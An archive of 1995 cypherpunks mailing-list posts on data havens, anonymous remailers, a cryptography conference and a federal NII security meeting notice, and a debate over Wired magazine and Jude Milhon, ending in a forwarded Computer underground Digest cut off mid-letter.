From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben.Goren@asu.edu
Date: Sun, 15 Jan 95 14:01:27 PST
To: Robert Rothenberg <cypherpunks@toad.com
Subject: Re: Another problem w/Data Havens...
Message-ID: <v02110101ab3f4b2da617@[129.219.97.131]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:45 PM 1/14/95, Robert Rothenberg wrote:
>[. . .]
>How does one keep a site from becomming a remote pirated-software exchange
>site? [. . . .]

Simple. The file is deleted upon retrevial.

b&

--
Ben.Goren@asu.edu, Arizona State University School of Music
 Finger ben@tux.music.asu.edu for PGP public key ID 0x875B059.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mats Bergstrom <asgaard@sos.sll.se>
Date: Sun, 15 Jan 95 12:47:17 PST
To: cypherpunks@toad.com
Subject: Re: Another problem w/Data Havens...
In-Reply-To: <9501150445.AA13977@toad.com>
Message-ID: <Pine.HPP.3.91.950115145754.101B-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


Robert Rothenberg wrote:

> such a service could become a magnet for the "elite warez" crowd...


What's wrong with young, curious eLiTiStS running storing sites for
mutual benefits ('warez')? Some say copyright is dead. Others have
taken this to their hearts, especially for private use, and I don't
blame them. Copyrighted data on a server in a jurisdiction that
doesn't acknowledege the copyrights - a prime use for Data Havens
when they come of age.

Mats




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Sun, 15 Jan 95 12:42:01 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: 2 announcements of possible interest
Message-ID: <199501152041.PAA10484@bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


2 announcements (one from PRIVACY, the other from Cyberia.)

second is NII Security Issues Forum to Hold 2 Meetings 01/27/95 NEW
 01/12/95


Date:    Fri, 13 Jan 95 11:25:27 EST
From:    denning@cs.cosc.georgetown.edu (Dorothy Denning)
Subject: INTERNATIONAL CRYPTOGRAPHY INSTITUTE 1995

             Call for Participation (Deadline: March 15, 1995)

       INTERNATIONAL CRYPTOGRAPHY INSTITUTE 1995: GLOBAL CHALLENGES

                          September 21-22, 1995
                              Washington, DC

	                       Presented by
	     The National Intellectual Property Law Institute 


The International Cryptography Institute will focus on the cryptography
challenges associated with meeting the information protection needs of
users and the law enforcement and national security needs of nations.
The Institute will address such topics as:

  - national encryption policies and regulations
  - meeting user needs for information security and data recovery 
  - meeting law enforcement and national security needs
  - national and global encryption markets and product availability
  - international approaches and standards
  - creating an international cryptography infrastructure
  - the use of encryption technologies in different countries
  - cryptography in the financial industry and other industries
  - legal and policy issues of digital signatures and digital cash
  - new developments in encryption policies and technologies

Persons interested in speaking at the conference are invited to submit
a proposal to the Institute Chair:
	
	      Prof. Dorothy E. Denning, Chair ICI '95
	      Georgetown University
	      Computer Science Department
	      225 Reiss Building
	      Washington DC 20057-0997
	      ph: 202-687-5703, fax: 202-687-6067
	      e-mail: denning@cs.georgetown.edu

Proposals must be received by MARCH 15, 1995, and should include the
following:

  - Name, title, organization, address, phone, fax, and e-mail address
  - Brief biography
  - Title of presentation
  - Abstract of presentation or paper
  - Amount of time requested for presentation and discussion

Notification of acceptance will be made by April 15, 1995.  Papers and
materials for the proceedings will be due on August 15, 1995.
   
Inquiries about registration or the proceedings should be addressed to:

              The National Intellectual Property Law Institute
              P.O. Box 27913, Washington, DC 20038-7913
              ph:  800-301-MIND or 202-962-9494
              fax: 800-304-MIND or 202-962-9495

------------------------------

From: Seth Greenstein <sethg@access.digex.net>

Subject: NII Security Issues Forum to Hold 2 Meetings 01/27/95 NEW 01/12/95

OFFICE OF MANAGEMENT AND BUDGET

NOTICE OF PUBLIC MEETING 

Agency:  Office of Management and Budget

Action:  National Information Infrastructure Security Issues
Forum:  Notice of Public Meetings and request for public comments

SUMMARY:  The National Information Infrastructure Security Issues
Forum will conduct two public meetings to continue a dialogue
between government and the private and public interest sectors on
issues related to the security of information on the National
Information Infrastructure (NII). Interested parties --
especially beneficiaries of Aid to Families with Dependent
Children and Food Stamps, and users of public information, and
participants in the sophisticated communications networks which
support the U.S. transportation and customs systems -- are
invited to submit a 1 - 2 page position statement and request to
testify.  

     The meetings are sponsored by the NII Security Issues Forum
of the Information Infrastructure Task Force and Mega-Project III
of the U.S. Advisory Council on the NII.  

DATES:  Both public meetings, "Security of the Electronic
Delivery of Government Information and Services" and "Security
for Intelligent Transportation Systems and Trade Information,"
will be held simultaneously on Friday, January 27, 1995, from
9:00 a.m. to 12:30 p.m. in Raleigh, North Carolina. 


     Those wishing to testify should submit a 1 - 2 page position
statement and request to participate by January 20, 1995. 
Individuals wishing to offer general comments or present
questions may request to do so during the meeting.  Written
comments may be submitted on paper or electronically, in ASCII
format, and will be accepted until February 10, 1995.  

ADDRESSES:  The public meeting, "Security of the Electronic
Delivery of Government Information and Services," will be held in
the Auditorium of the North Carolina Museum of History, 1 East
Edenton Street, Raleigh, North Carolina.  The public meeting,
"Security for Intelligent Transportation Systems and Trade
Information," will be held in the Auditorium of the Department of
Cultural Affairs, 109 East Jones Street, Raleigh, North Carolina. 
Both buildings are in close proximity to the North Carolina
Capitol Building. 

     Position statements and requests to appear for the meeting,
"Security of the Electronic Delivery of Government Information
and Services,"   sent to the Government Information Technology
Services Working Group, marked to the attention of Ms. April
Ramey, U.S. Department of the Treasury, 1425 New York Avenue,
Room 2150 N.W., Washington, D.C.  20220.  Position statements may
also be submitted via fax to (202) 622-1595 or through electronic
mail to april.ramey@treas.sprint.com.  Electronic mail should be
submitted as unencoded, unformatted, ASCII text.  

     Position statements and requests to appear for the meeting,
"Security for Intelligent Transportation Systems and Trade
Information," should be sent to the Volpe National Transportation
Systems Center of the Department of Transportation, marked to the
attention of Mr. Gary Ritter, DTS-21, at 55 Broadway, Cambridge,
MA, 02142.  Position statements may also be submitted via fax to
(617) 494-2370 or through electronic mail to
"Ritter@volpe1.dot.gov".  Electronic mail should be submitted as
unencoded, unformatted, ASCII text.  

     Parties offering testimony are asked to provide them on
paper, and where possible, in machine-readable format.  Machine-
readable submissions may be provided through electronic mail
messages sent over the Internet, or on a 3.5" floppy disk
formatted for use in an MS-DOS based computer.  Machine-readable
submissions should be provided as unencoded, unformatted ASCII
text.      

     Written comments should include the following information:  
*    Name and organizational affiliation, if any, of the
     individual responding;
*    An indication of whether comments offered represent views of 
    the respondent's organization or are the respondent's
     personal views; and
*    If applicable, information on the respondent's organization, 
    including the type of organization (e.g., trade association,  
   private corporation, non-profit organization) and general     
areas of interest. 

FOR FURTHER INFORMATION CONTACT:   For further information
relating to electronic delivery of information and services,
contact Ms. April Ramey of the Treasury Department at (202) 622-
1278. 

     For further information relating to transportation and trade
issues, contact Mr. Gary Ritter at the Volpe National
Transportation Systems Center by telephone at (617) 494-2716.

SUPPLEMENTARY INFORMATION:  

I.  Issues for Public Comment

A.   Background 

     The public meetings are part of an ongoing dialogue with the
Administration to assess the security needs and concerns of users
of the National Information Infrastructure (NII).  The NII is a
system of high-speed telecommunications networks, databases, and
advanced computer systems that will make electronic information
more widely available and accessible than ever before.  For
example, citizens may be able to learn about federal benefits
programs through public kiosks, or may receive their social
security payments through direct deposit to their bank accounts. 
As the U.S. transportation infrastructure becomes more complex,
Americans will benefit from the application of information
technologies to such operations as toll collection, motor vehicle
registration, and traffic routing.  This increased availability
and accessibility of services and products provided through
information technology will dramatically affect the way in which
individuals conduct their everyday affairs. 

     Consequently, broad public and commercial use of the NII
hinges upon implementing technologies, policies, and practices
that not only ensure that users of information systems have
access to information when and where they need it, but that
subjects of information records are able to protect themselves
from unauthorized or inappropriate use of information.    

     "Americans will not use the NII to its full potential unless
they trust that information will go where and when they want it
and nowhere else," declared Sally Katzen, Administrator of the
Office of Information Regulatory Affairs at OMB and chair of the
Forum.  "The Federal government is a primary user of the NII and
thus a catalyst for change.  Yet the NII will be designed, built,
owned, operated, and used primarily by the private sector, making
it essential that security on the NII be considered in
partnership with the public."

     To address these critical issues, the Vice President formed
the Information Infrastructure Task Force (IITF).  The IITF is
chaired by Secretary of Commerce Ron Brown and is comprised of
senior Administration officials having expertise in technical,
legal, and policy areas pertinent to the NII.  The mission of the
IITF is to articulate and implement the Administration's vision
for the NII.  

     The NII Security Issues Forum was established within the
IITF to address the cross-cutting issue of security in the NII. 
The Forum is chaired by Sally Katzen, Administrator of the Office
of Information and Regulatory Affairs in the Office of Management
and Budget.  

     In addition to the IITF, the President has established the
U.S. Advisory Council on the National Information Infrastructure. 
The Advisory Council represents industry, labor, and public
interest groups, and advises the Secretary of Commerce on issues
relating to the NII.  Mega-Project III, one of three work groups
of the Advisory Council, is responsible for addressing security,
intellectual property, and privacy issues as they relate to the
NII.

B.   Structure and Content of Public Meeting

     Security is linked inextricably to broad public use of the
NII.  The technologies, policies, and procedures used to ensure
the confidentiality, availability, and integrity of digitally
produced and transmitted information, information products, and
services on the NII will determine whether, how, and to what
extent digitally linked information services will be broadly used
in such critical applications as providing public information,
supporting the delivery of government services, utilizing
intelligent transportation systems, and conducting trade. 

     Development of policies and procedures that will ensure the
security of public and private information and communications on
the NII requires study from different perspectives, whether that
of the subject of the information, the user of the information,
or the creator of the information.  The Forum and Mega-Project
III seek input from parties representing beneficiaries of federal
information and services and users of intelligent transportation
systems and trade data.

     Solutions to these concerns will come via technical
solutions, as well as legal and policy mechanisms.  The Forum and
Mega-Project III seek input in this area as well.  Specifically,
what legal measures, policy mechanisms, and technological
solutions, or combinations thereof, can be used to effectively
protect the security of federal benefits information or
transportation or trade data, delivered or made accessible on the
NII?  

     A panel of witnesses drawn from the public will be assembled
to discuss the following topics with a panel of senior
Administration officials, members of the Security Issues Forum,
members of the Advisory Council, and policy makers at the State
level, and to field questions and comments from other members of
the public.  

     Position statements for the meeting, "Security in the
Delivery of Electronic Information and Services," should address
four principal questions:  

1.   How do you envision the NII being used to provide services   
  and information electronically to citizens?  Specifically,     
what types of services and information should be delivered     
or made available? 

2.   What risks and threats do you foresee in making services and 
    information available via the NII?  Such threats might     
include fraud, unauthorized access, breach of
     confidentiality or privacy, breach of integrity, and system  
   performance.

3.   What legal, policy, and ethical issues do you foresee
     affecting usage of the NII?  Such issues may include
     liability, information/property rights, access,
     document/records management, legal admissibility/evidentiary 
    requirements, and auditability.  Do some issues, such as     
privacy and open access, tend to countervene each other? 

4.   What kinds of administrative or technical solutions should   
  be developed or promoted to address security, legal, and     
ethical concerns?  Such solutions may include verifying     
recipient and/or vendor eligibility, ensuring operational     
and systems security, and establishing means to facilitate     
settlement, detection, and prosecution.  

     Position statements for the meeting, "Security for
Intelligent Transportation Systems and Trade Information," should
address five principal questions:

1.   Who should be permitted access to sensitive trade and
     transportation information systems?  How can inappropriate   
  access and use be prevented?

2.   What technical and institutional safeguards in electronic    
 data transmission, storage, and retrieval are needed to     
protect the security of trade and transportation data?  Such     
risks might include:  disclosure of proprietary and
     confidential business information, criminal access to trade  
   and cargo records, disclosure of individual travel patterns    
 or vehicle locations, or disclosure of transportation
     dispatch communications regarding sensitive cargo shipment   
  routes, itineraries, and locations.

3.   What does an "appropriate level of security" consist of?  Is 
    there a "one-size-fits-all" solution, or can policies be     
established which flexibly meet diverse needs?
  
4.   Do certain systems merit greater degrees of security
     protection, such as traffic signal control systems, variable 
    message signs, fleet location monitoring, electronic toll     
collection, international trade data, and motor vehicle     
registration records?  
 
5.   Who should establish and enforce security policies?  How can 
    government and the private sector work together to support a  
   secure National Information Infrastructure?

II.  Guidelines for Participation in the Public Hearing

     Individuals who would like to participate on a panel must
request an opportunity to do so no later than January 20, 1995,
by submitting a brief, 1 - 2 page summary position statement.  If
approved, each participant will be allowed to present brief
opening remarks.  Primary participation, however, shall be during
the general discussion to follow, according to the format
described above.  

     Participants in the public meeting will testify before and
participate in discussions with a panel consisting of members of
the Advisory Council, members of the Security Issues Forum, and
other Administration officials.  

     Individuals not selected as panel participants may offer
comments or ask questions of the witnesses by requesting an
opportunity to do so and being recognized during the meeting by
the chairs of the meetings.  Oral remarks offered in this fashion
should not exceed three minutes.  No advance approval is required
to attend the public meetings, offer comments, or present
questions.

     The public meeting on "Security of the Electronic Delivery
of Information and Services" will be chaired by Mr. Jim Flyzik,
Chair of the Government Information Technology Services Working
Group of the IITF. 

     The public meeting on "Security for Intelligent
Transportation Systems and Trade Information," will be co-chaired
by Ms. Ana Sol Gutierrez, Deputy Administrator of the Research
and Special Programs Administration of the U.S. Department of
Transportation, and Ms. Christine Johnson, Director of the
Intelligent Transportation Systems Joint Program Office of the
U.S. Department of Transportation. 

     More information about the Clinton Administration's National
Information Infrastructure initiative can be obtained from the
IITF Secretariat.  Inquiries may be directed to Yvette Barrett at
(202) 482-1835, by e-mail to ybarrett@ntia.doc.gov, or by mail to
U.S. Department of Commerce, IITF Secretariat, NTIA, Room 4892,
Washington, D.C., 20230.  

     For inquiries over the Internet to the IITF Gopher Server,
gopher, telnet (login = gopher), or anonymous ftp to
iitf.doc.gov.  Access is also available over the World-Wide-Web. 
Questions may be addressed to nii@ntia.doc.gov.  

     For access by modem, dial (202) 501-1920 and set modem
communication parameters at no parity, 8 data bits, and one stop
(N,8,1).  Modem speeds of up to 14,400 baud are supported.  

Sally Katzen
Administrator, Office of Information and Regulatory Affairs
Certified to be a true copy of the original by John B. Arthur,
Associate Director for Administration




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rishab@dxm.ernet.in
Date: Sun, 15 Jan 95 16:38:24 PST
To: cypherpunks@toad.com
Subject: Jude Milhon in WIRED
Message-ID: <gate.J1PZyc1w165w@dxm.ernet.in>
MIME-Version: 1.0
Content-Type: text/plain



WIRED 3.02 (February) interviews Jude Milhon (St. Jude) who "is a charter
member of the cypherpunks - a term that she coined." I didn't even know there
_was_ a charter. The interview as such is mainly about why "girls _need_
modems."



-----------------------------------------------------------------------------
Rishab Aiyer Ghosh                                "In between the breaths is
rishab@dxm.ernet.in                                  the space where we live"
rishab@arbornet.org                                        - Lawrence Durrell
Voice/Fax/Data +91 11 6853410  
Voicemail +91 11 3760335                 H 34C Saket, New Delhi 110017, INDIA  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: root <root@einstein.ssz.com>
Date: Sun, 15 Jan 95 16:50:09 PST
To: ianf@sydney.sgi.com (Ian Farquhar)
Subject: Re: Draft of editorial to SF Chronicle
In-Reply-To: <9501161049.ZM27032@wiley.sydney.sgi.com>
Message-ID: <199501160027.SAA00332@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text


> 
> Ditto.
> 
> > In many countries (and even China is on the Net these days), writings
> > critical of the government, such as exposure of human rights abuses,
> > are illegal. The authors face imprisonment, torture and death. By
> > posting anonymously to the Net, the information can be brought safely
> > to the attention of the world.
> 
> Perhaps mention the Russian coup, where the net became a conduite for
> information leaving Moscow.  I remember a colleague of mine announcing
> incidents which had occured within Moscow hours before the news services
> broadcast them, simply by getting emails from a colleague nearby,
> 
>
It was even possible to get eyewitness descriptions of much of the troop
movement in Moscow in near real-time on #russia. The attack on the Russian
White House was in particular quite interesting to watch on CNN and compare
what was going on via irc comments.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Sun, 15 Jan 95 20:30:18 PST
To: perry@imsi.com
Subject: Re: Jude Milhon in WIRED
In-Reply-To: <9501160118.AA05350@snark.imsi.com>
Message-ID: <199501160356.TAA09359@netcom2.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



Perry E. Metzger wrote:

> rishab@dxm.ernet.in says:
> > WIRED 3.02 (February) interviews Jude Milhon (St. Jude) who "is a charter
> > member of the cypherpunks - a term that she coined." I didn't even know there
> > _was_ a charter.
> 
> Or a Jude Milhon, for that matter. Another example of the continuing
> decay of a once proud magazine...

I'm not sure what Perry's not having heard of Jude Milhon is supposed
to mean, or how "Wired" interviewing her is "another example of the
continuing decay," etc.

In any case, Jude Milhon has been active in the hacker-writer
community, going back to the 1970s. Steven Levy's "Hackers" has
several pages on her role in various things happening in the Lee
Felsenstein circle of folks (there may be some of you who have no idea
who Lee is....I can only hope that when you find interviews with him
you not assume decay is occurring). More recently she was an editor at
"Mondo 2000" and has had various connections to Cypherpunks.

Jude was indeed the coiner of the "cypherpunk" term, and was at most of
the early meetings, for at least the first year. (My FAQ will have
more information on how Jude came to think of the name and whatnot.)

She's not presently subscribed and hence can't speak up in this
strange matter of how an interview with her implies a magazine is in
decay.

(I'm hoping this is not what Perry really meant, but I can't see any
other interpretations based on what I quoted above.)

I just don't think Jude deserves this kind of casual trashing. 

While I haven't been reading "Mondo" regularly for a couple of years,
and while I'm getting bored with "Wired," this doesn't mean that
people being interviewed deserve trashing. (Indeed, the "bleeding
edge" trendiness of "Wired," say, means that nearly anything once
"wired" is fated to be marked as "tired" by the "stimulate me!"
Starbucks crowd of techno-yuppies. Unlike a more staid journal, like
"Nature" or "The Economist," as examples, trendy techno-style mags
like "Wired," "Spin," "boing boing," "Future Sex," and a hundred other
wirehead variants of "Vogue" and "People" will appeal precisely to the
style mavens who so fickly announce what is trendy and what is not.

Anyone who professes to be "disappointed" by "Wired" was clearly taken
in by their hype.

(For what it's worth, I still enjoy flipping through the pages, often
finding one or two items that spark my thinking. No, much of it is
junk. So what else is new?)

Oh, and on Rishab's original point about "charter members," I took
this in the usual figurative sense. A charter member of the
Cypherpunks is basically just a card-carrying member. (Hint: Find your
own cards.)

--Tim



-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "A.J. Janschewitz" <aj@pcnet.com>
Date: Sun, 15 Jan 95 17:00:00 PST
To: rishab@dxm.ernet.in
Subject: Re: Jude Milhon in WIRED
In-Reply-To: <gate.J1PZyc1w165w@dxm.ernet.in>
Message-ID: <Pine.3.88.9501151917.A8096-0100000@pcnet1.pcnet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 15 Jan 1995 rishab@dxm.ernet.in wrote:

> WIRED 3.02 (February) interviews Jude Milhon (St. Jude) who "is a charter
> member of the cypherpunks - a term that she coined." I didn't even know there
> _was_ a charter. The interview as such is mainly about why "girls _need_
> modems."

WiReD. What a waste of pulp; worse, what a waste of potential. A magazine 
that could have held the hands of aol novices and led them into the real 
net.world, and promoted freenets, and demonstrated the need for 
cryptosystems, and challenged the minds of net citizens decided to take 
the low road and become "USA Today" (for cypherpunks abroad, "USA-T" is a 
`newspaper' that looks like a big comic book, and doesn't trouble its 
readers with many syllables ... rather like Prodigy ...).

==a.j.==

--
  "The large print giveth and the small print taketh away." - Tom Waits





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Sun, 15 Jan 95 17:19:37 PST
To: rishab@dxm.ernet.in
Subject: Re: Jude Milhon in WIRED
In-Reply-To: <gate.J1PZyc1w165w@dxm.ernet.in>
Message-ID: <9501160118.AA05350@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



rishab@dxm.ernet.in says:
> WIRED 3.02 (February) interviews Jude Milhon (St. Jude) who "is a charter
> member of the cypherpunks - a term that she coined." I didn't even know there
> _was_ a charter.

Or a Jude Milhon, for that matter. Another example of the continuing
decay of a once proud magazine...

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pstemari@erinet.com (Paul J. Ste. Marie)
Date: Sun, 15 Jan 95 17:45:38 PST
To: cypherpunks@toad.com
Subject: Re: How do I know if its encrypted?
Message-ID: <9501160137.AA17721@eri.erinet.com>
MIME-Version: 1.0
Content-Type: text/plain


>>             newsgroups.  Mandating encryption renders this mode useless.
>>                          ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
>
At 02:42 AM 1/15/95 -0600, Larry E wrote:
>Here, I don't understand your point.  If you mean an encrypted
>message to a remailer cannot result in a plaintext usenet posting,
>that of course is not true.  The remailers have PGP keys of their
>own, just as any private user may.  In addition, some of the
>remailers support direct usenet posting.  Thus, a message may be
>encrypted to the remailer and posted as plaintext as the remailer
>decrypts the message.

I wasn't referring to requiring encryption using the remailer's public key.  
I was referring to the stuff discussed here, where the remailer operator 
insists on ensuring that the traffic is encrypted over and beyond the 
remailer's public key, in order to give the operator plausable deniability.

Really, all inbound remailer traffic should be encrypted with the remailer's 
public key if any significant level of security is desired.

    --Paul J. Ste. Marie
      pstemari@well.sf.ca.us, pstemari@erinet.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: merriman@metronet.com (David K. Merriman)
Date: Sun, 15 Jan 95 18:44:58 PST
To: cypherpunks@toad.com
Subject: hiatus
Message-ID: <199501160245.AA09108@metronet.com>
MIME-Version: 1.0
Content-Type: text/plain


Just a short note to let folks know that I'll be unsubscribing for a while
(probably a couple of months) while I get ready and then move to Amarillo to
set up an ISP :-)

The staging phase is taking up a large portion of my time, and I really
don't have the slack to do more than give the subject lines in the CP list a
cursory glance these days - just enough to see what the current flame war is
about :-)

Once I get the ISP set up, I'll be putting an anon remailer on it; I may
also offer "Remailer-in-a-box" accounts for some relatively minor fee (if
motivated, I may even take digicash as payment :-). I don't expect any
problems about setting up accounts, since I'll be the MIS Manager, VP
Engineering, etc, etc. Too, since the service will be commercial, I expect
that I'll be able to do a pretty fair job of ignoring complaints of the kind
that get .edu and on-the-left remailers shut down.

I'll still be able to receive email at this account at least until the end
of February; once I get set up in Amarillo, I'll resub and let everyone know
where I am (just in case anyone cares :-)

FYI, the tentative name for the ISP is panhandle.net.....

Dave Merriman
- - - - - - - - - - - - - - - - - - - - - - - - - - 
Finger merriman@fohnix.metronet.com for PGP public key and fingerprint.
PGP encrypted Email welcome, encouraged, and preferred.
"Those who make peaceful revolution impossible will make violent revolution 
inevitable."  John F. Kennedy 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jml@wizard.synapse.net
Date: Sun, 15 Jan 95 18:03:44 PST
To: cypherpunks@toad.com
Subject: interesting problem with remailers
Message-ID: <199501160203.VAA07586@sentinel.synapse.net>
MIME-Version: 1.0
Content-Type: text/plain


I need a good dependable cypherpunk style anomymous remailer. So I have been 
experimenting with a few.
I have discovered a rather curious problem. I have sent test messages to 
homer@rahul.net. These test messages read as follows:

::
Request-Remailing-To: myname@mydonain
Subject: Test

this is line1
this is line2
this is line3
this is line4
this is line5
this is line6

I have encrypted this message with the public key of homer@rahul.net using the 
pgp -ea command (for armour). This yields something like:

-----BEGIN PGP MESSAGE----
version 2.6.2

blahblahblah
blah blah
blah blah etc.....
------END PGP MESSAGE---

I have then put
::
Encrypted: PGP
<blank line>
 
at the beginning of the message and send it with Eudora PC 1.4.
Now curiously enough the message that I received back from homer@rahul is the 
following:

*************************************************************
To: myname@mysite
From: nobody@rahul.net
Subject: Test
Remailed-By: A Free Zone Remailer V1.2 <homer@rahul.net>
Complaints-To: Homer Wilson Smith <homer@rahul.net>
X-Comments: 
X-Comments:       finger homer@rahul.net for instructions.
X-Comments: 
X-Comments: Unauthorized or illegal use of this remailer, especially
X-Comments: for spamming the internet or posting copyright violations
X-Comments: will be prosecuted to the fullest extent of the law.
X-Comments: Homer Wilson Smith  (607) 277-0959, Fax: (607) 277-8913
X-Comments:                FULL HEADER LOGGING IS: ON

This is line1
this is line3
this is line5
*************************************************************

No this is line2
no this is line4
no this is line6

I am unable to explain this. Obviously the message must be recieved intact by 
the remailer because being encrypted with PGP if it were corrupt in anyway it 
would simply not decode properly and I would get no reply whatsoever. Now 
before somebody says that the trouble is at my site, I also have an account on
CI$ (compuserve). The same thing happens to message I received there. So 
obviously it cannot be my site. Unless I am doing something that somehow tells 
the remailer to only remail one line out of two. (?????)
And this problem is not only with homer@rahul. Other remailers do the same.
I know that it most be something that I am doing but it escapes me what. Again 
it must receive the PGP message correctly. I am stumped....
If anybody can help explain this little mystery, it would be most appreciated.

Please reply here at cypherpunks@toad.com and also forward to
wizard@alpha.c2.org (to see if it works)

Thanks all
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAy8X2ZIAAAEEALbeB9136vtAk/FOOb8a1rYv7OWAVJZMiWs/CI1Hla9iUxBj
hv+KM1rK31cygbk2/y38cZFQupgP34/0HkLKXsl5bP7vifXi5JzyNpeOmYT3Cr/E
FqyWRFUo6dyp7AVm23ryZGZAM2qfcdXaslEqWAD3PczAnQ34vKhVa3SvpHjhAAUR
tAZ3aXphcmQ=
=syn9
-----END PGP PUBLIC KEY BLOCK-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: erc@s116.slcslip.indirect.com (Ed Carp [khijol Sysadmin])
Date: Sun, 15 Jan 95 20:45:28 PST
To: tcmay@netcom.com (Timothy C. May)
Subject: Re: Jude Milhon in WIRED
In-Reply-To: <199501160356.TAA09359@netcom2.netcom.com>
Message-ID: <m0rTjIC-0004J0C@s116.slcslip.indirect.com>
MIME-Version: 1.0
Content-Type: text


> Jude was indeed the coiner of the "cypherpunk" term, and was at most of
> the early meetings, for at least the first year. (My FAQ will have
> more information on how Jude came to think of the name and whatnot.)

I, for one, would like to see this - I've only been on the list for a bit
over two years, and I'd never heard of Jude, either.
-- 
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
801/534-8857 voicemail			801/460-1883 digital pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi
                       ** PGP encrypted email preferred! **
"How many beers have you had tonight, bro?"  "Seventy."  -- "Cops"



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Sun, 15 Jan 95 21:57:17 PST
To: ecarp@netcom.com
Subject: Re: Jude Milhon in WIRED
In-Reply-To: <m0rTjIC-0004J0C@s116.slcslip.indirect.com>
Message-ID: <199501160556.VAA05701@netcom19.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Ed Carp [khijol Sysadmin] wrote:
> 
> > Jude was indeed the coiner of the "cypherpunk" term, and was at most of
> > the early meetings, for at least the first year. (My FAQ will have
> > more information on how Jude came to think of the name and whatnot.)
> 
> I, for one, would like to see this - I've only been on the list for a bit
> over two years, and I'd never heard of Jude, either.

It's in the Cyphernomicon FAQ...just grep for it.

--Tim May


-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@hawksbill.sprintmrn.com (Paul Ferguson)
Date: Sun, 15 Jan 95 18:58:12 PST
To: cypherpunks@toad.com
Subject: ... and speaking of WiReD...
Message-ID: <9501160258.AA09372@hawksbill.sprintmrn.com>
MIME-Version: 1.0
Content-Type: text



Given the recent discussion on WireD, I thought some of you
might enjoy this editorial (read: rant) authored by Erik Bloodaxe.

Enjoy.

- paul



Forwarded message:

> Date:         Sun, 15 Jan 1995 20:34:00 CST
> Reply-To: TK0JUT2@MVS.CSO.NIU.EDU
> Sender: CU-DIGEST list <CUDIGEST@UIUCVMD.BITNET>
> From: "Cu Digest (tk0jut2@mvs.cso.niu.edu)" <TK0JUT2@MVS.CSO.NIU.EDU>
> Subject:      Cu Digest, #7.03
> To: Multiple recipients of list CUDIGEST <CUDIGEST@UIUCVMD.BITNET>
> 
> Computer underground Digest    Sun  Jan 15, 1995   Volume 7 : Issue 03
>                            ISSN  1004-042X
> 
>        Editors: Jim Thomas and Gordon Meyer (TK0JUT2@NIU.BITNET)
>        Archivist: Brendan Kehoe
>        Retiring Shadow Archivist: Stanton McCandlish
>        Shadow-Archivists: Dan Carosone / Paul Southworth
>                           Ralph Sims / Jyrki Kuoppala
>                           Ian Dickinson
>        Copy Reader:       Laslo Toth
> 
> CONTENTS, #7.03 (Sun, Jan 15, 1995)
> 
> File 1--Open Letter to Wired Magazine (fwd)
> File 2--More Legal Analysis of Steve Jackson Games (Legal Bytes)
> File 3--The Stupid Net.Coverage News Awards -- 1994 and 1995
> File 4--Alliance for Community Media -- Call for Workshops
> File 5--Cu Digest Header Info (unchanged since 25 Nov 1994)
> 
> CuD ADMINISTRATIVE, EDITORIAL, AND SUBSCRIPTION INFORMATION APPEARS IN
> THE CONCLUDING FILE AT THE END OF EACH ISSUE.
> 
> ----------------------------------------------------------------------
> 
> Date: Sat, 14 Jan 1995 20:08:38 -0600 (CST)
> From: David Smith <bladex@BGA.COM>
> Subject: File 1--Open Letter to Wired Magazine (fwd)
> 
>                ---------- Forwarded message ----------
> 
> >From--phrack@well.sf.ca.us (Chris Goggans)
> >Subject--Open Letter to Wired Magazine
> >Date--13 Jan 1995 00:51:09 GMT
> 
> To Whom It May Concern:
> 
> I am writing this under the assumption that the editorial staff at
> Wired will "forget" to print it in the upcoming issue, so I am also
> posting it on every relevant newsgroup and online discussion forum
> that I can think of.
> 
> When I first read your piece "Gang War In Cyberspace" I nearly choked
> on my own stomach bile.  The whole tone of this piece was so far
> removed from reality that I found myself questioning what color the
> sky must be in Wired's universe.  Not that I've come to expect any
